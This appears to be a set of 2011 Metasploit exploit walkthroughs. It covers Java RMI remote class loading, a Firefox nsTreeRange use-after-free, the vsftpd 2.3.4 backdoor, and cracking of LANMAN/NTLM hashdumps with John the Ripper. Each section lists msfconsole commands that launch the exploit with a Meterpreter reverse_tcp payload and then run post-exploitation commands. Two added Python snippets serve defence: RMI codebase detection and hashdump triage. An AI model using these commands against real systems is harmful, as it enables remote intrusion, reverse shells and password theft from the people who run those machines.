Java RMI Server Insecure Default Configuration Java Code Execution

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
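The remote class loading the description refers to travels inside the RMI call itself: when the client serializes its call arguments, the codebase it wants the server to fetch classes from is written as a String annotation right after each class descriptor's field list. The Python below is an added example, not part of the Metasploit module or of Oracle's code; it applies that heuristic to a reassembled client-to-server stream so a sensor can raise an alert on RMI calls that announce an HTTP codebase. The sample stream, the class name FakeRequest and the codebase URL are constructed for the example.

```python
import re
import struct

JRMI_MAGIC = b"JRMI"                     # header a client sends on connect
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream stream header
TC_STRING = 0x74                         # serialization tag: String
TC_ENDBLOCKDATA = b"\x78"                # serialization tag: end of class annotation
TC_NULL = b"\x70"                        # serialization tag: null (no codebase)

def find_codebase_annotations(payload):
    """Return http(s) URLs written as class annotations in a serialized stream.
    Heuristic: a TC_STRING holding a URL immediately followed by TC_ENDBLOCKDATA,
    which is where RMI's MarshalOutputStream writes the client's codebase."""
    found = []
    i = payload.find(JAVA_SERIAL_MAGIC)
    if i < 0:
        return found
    i += len(JAVA_SERIAL_MAGIC)
    while i + 3 <= len(payload):
        if payload[i] == TC_STRING:
            (length,) = struct.unpack(">H", payload[i + 1:i + 3])
            text = payload[i + 3:i + 3 + length]
            end = i + 3 + length
            if re.match(rb"^https?://", text) and payload[end:end + 1] == TC_ENDBLOCKDATA:
                found.append(text.decode("utf-8", "replace"))
        i += 1
    return found

def classify_rmi_stream(payload):
    """Label a reassembled client-to-server stream for alerting."""
    if not payload.startswith(JRMI_MAGIC):
        return "not-rmi"
    return "remote-codebase" if find_codebase_annotations(payload) else "rmi-no-codebase"

def build_call_stream(annotation):
    """Constructed sample: handshake (version 2, StreamProtocol), a Call message and
    one class descriptor 'FakeRequest' (hypothetical) carrying the given annotation."""
    return (JRMI_MAGIC + b"\x00\x02\x4b" + b"\x50" + JAVA_SERIAL_MAGIC
            + b"\x72\x00\x0bFakeRequest"              # TC_CLASSDESC, class name
            + b"\x00" * 8 + b"\x02\x00\x00"           # serialVersionUID, flags, 0 fields
            + annotation + TC_ENDBLOCKDATA + TC_NULL)  # annotation, end, no superclass

CODEBASE = b"http://192.168.178.21:8080/"  # constructed; host is the write-up's SRVHOST
REMOTE_LOAD = build_call_stream(b"\x74" + struct.pack(">H", len(CODEBASE)) + CODEBASE)
LOCAL_ONLY = build_call_stream(TC_NULL)

if __name__ == "__main__":
    for name, stream in (("remote", REMOTE_LOAD), ("local", LOCAL_ONLY)):
        print(name, classify_rmi_stream(stream), find_codebase_annotations(stream))
```

A hit on a registry, rmid or custom RMI port is worth an alert on its own; the fix on the server side is to refuse remote codebases, so no legitimate client should ever send one.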

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and below
Firefox 3.5.18 and below
Seamonkey 2.0.13 and below

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

John the Ripper (jtr_crack_fast) built into Metasploit

The Metasploit team has released a John the Ripper password cracker integration into Metasploit. It is now possible to crack weak passwords gathered in hash files, or LANMAN/NTLM hashdumps, directly from msfconsole.

JtR is integrated as an “analyze” auxiliary module called “jtr_crack_fast”, and can be used by typing this command :

In order to use this auxiliary module you first need Metasploit database support (postgres or mysql) and to be connected to this database. To create and/or connect to a database, you only need to type these commands :

If you don’t have an existing database, “db_connect” will create the database for you. You can also use the “db_status” command to verify your connection.

Once you have exploited a Windows box and got a session with SYSTEM privileges, you can gather all LANMAN/NTLM hashdumps with the “hashdump” post exploitation module.

All gathered hashdumps are stored in the “creds” table of the database.

Now that you have hashdumps in the database, you can try to crack weak passwords with the integrated Metasploit John the Ripper.

If passwords are cracked successfully, the cracked passwords are also stored in the “creds” table of the database.

The Metasploit built-in JtR includes a standard wordlist and rules, but you can also provide the module with the path of the directory containing JtR (JOHN_BASE), and the absolute path to the JtR executable (JOHN_PATH).

The “john.conf” file is located by default in “/opt/metasploit3/msf3/data/john/confs/john.conf” and the wordlist in “/opt/metasploit3/msf3/data/john/wordlists/password.lst”.
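The hashdump lines that end up in the “creds” table have the form user:rid:lmhash:nthash:::. As an added example (not Metasploit code), the Python below parses that format and triages it the way a defender reviewing a dump would: accounts that still store an LM hash are the ones that fall first to a wordlist run, and accounts with an empty NT hash have no password at all. The sample dump is constructed; its non-empty hash values are placeholder hex, not real hashes.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
# hashdump line format: user:rid:lmhash:nthash:::
HASHDUMP_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_hashdump(text):
    """Parse hashdump output into dicts; malformed lines are reported, not dropped silently."""
    entries, bad = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASHDUMP_LINE.match(line)
        if not m:
            bad.append(line)
            continue
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries, bad

def triage(entries):
    """Flag what a cracker gets cheapest: stored LM hashes and empty NT passwords."""
    return {
        "lm_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "nt_only": [e["user"] for e in entries if e["lm"] == EMPTY_LM and e["nt"] != EMPTY_NT],
    }

# Constructed sample; the non-empty LM/NT values are placeholder hex, not real hashes
SAMPLE_HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:FEDCBA9876543210FEDCBA9876543210:0123456789abcdef0123456789abcdef:::
this line is not a hashdump entry
"""

if __name__ == "__main__":
    found, rejected = parse_hashdump(SAMPLE_HASHDUMP)
    print(triage(found))
    print("rejected:", rejected)
```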

vsftpd v2.3.4 Backdoor Command Execution

Timeline :

Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastebin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 from 2011-06-30 to 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a